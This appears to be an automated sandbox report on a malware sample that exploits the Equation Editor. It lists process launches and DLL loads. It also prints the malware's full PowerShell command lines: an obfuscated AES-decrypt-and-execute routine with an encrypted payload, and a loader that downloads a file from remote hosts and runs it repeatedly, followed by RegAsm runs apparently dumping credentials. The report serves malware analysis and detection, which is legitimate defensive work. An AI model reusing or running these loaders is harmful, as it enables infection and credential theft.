a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t"
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdthingstobefrankwithmeeverywhe.vBS" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs" Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\kwnuifnnlmnppbptlmxfdtbrgppi"Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\uqsnjxygzufcshdfcxkgggwipdhrwsi"Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\uqsnjxygzufcshdfcxkgggwipdhrwsi"Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\fkyx"Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t"
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: shcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptnet.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sensapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: credssp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cabinet.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: devrtl.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wbemcomn2.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntdsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
